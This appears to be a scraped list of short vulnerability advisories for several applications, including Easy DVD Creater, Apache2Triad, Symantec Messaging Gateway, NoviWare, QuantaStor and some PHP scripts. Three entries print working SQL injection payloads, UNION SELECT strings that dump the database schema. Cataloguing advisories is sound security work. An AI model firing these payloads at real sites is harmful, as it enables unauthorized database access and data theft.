Easy DVD Creater 2.5.11 is vulnerable to a buffer overflow vulnerability in the 'Enter User Name' field. An attacker can exploit this vulnerability by sending a specially crafted payload to the application, which can lead to arbitrary code execution.
Apache2Triad allows remote attackers to set an arbitrary PHPSESSID cookie, if a Apache2Triad user authenticates using the attacker controlled PHPSESSID the attacker can then access the Apache2Triad Web application with same level of access as that of the victim to potentially take over the Apache2Triad system. Apache2Triad is vulnerable to Cross Site Request Forgery (CSRF) attacks, this allows an attacker to perform actions on behalf of the victim if the victim is logged into the Apache2Triad Web application. Apache2Triad is vulnerable to Persistent Cross Site Scripting (XSS) attacks, this allows an attacker to inject malicious JavaScript code into the Apache2Triad Web application.
Symantec Messaging Gateway prior to and including version 10.6.3-2 contains an unauthenticated remote code execution vulnerability in the web interface. An attacker can construct a GET request to '/brightmail/action1.do?method=notificationLogin' with an encrypted version of the username they want to log in as, and set the JSESSIONID cookie to the current session. This will log the attacker in as the specified user.
The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service. This network service is prone to command injection and a stack-based buffer overflow.
QuantaStor login mechanism returns different messages if the account used to perform the login is valid or not in the system. Leveraging this difference an attacker coould enumerate valid usernames in the system. Two different XSS were found in the appliance. The first one is located in the login page and the second one in the 'User Management' page.
The vulnerability allows an attacker to inject sql commands into vulnerable parameters in the iTech Movie Script 7.51. Proof of Concept examples are provided in the text.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/Employer_Details.php?id=[SQL] -3'++UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332--+- http://localhost/[PATH]/Job_Details.php?id=[SQL]
The vulnerability allows an attacker to inject sql commands into the vulnerable parameters of the application. Proof of Concept examples are provided in the text.
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: http://localhost/[PATH]/search.php?category_id=[SQL] -9+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529)--+- http://localhost/[PATH]/product.php?id=[SQL] Etc...
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/hotel_view.php?id=[SQL] -9+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029)--+- http://localhost/[PATH]/bus_details.php?id=[SQL]
Services By CQR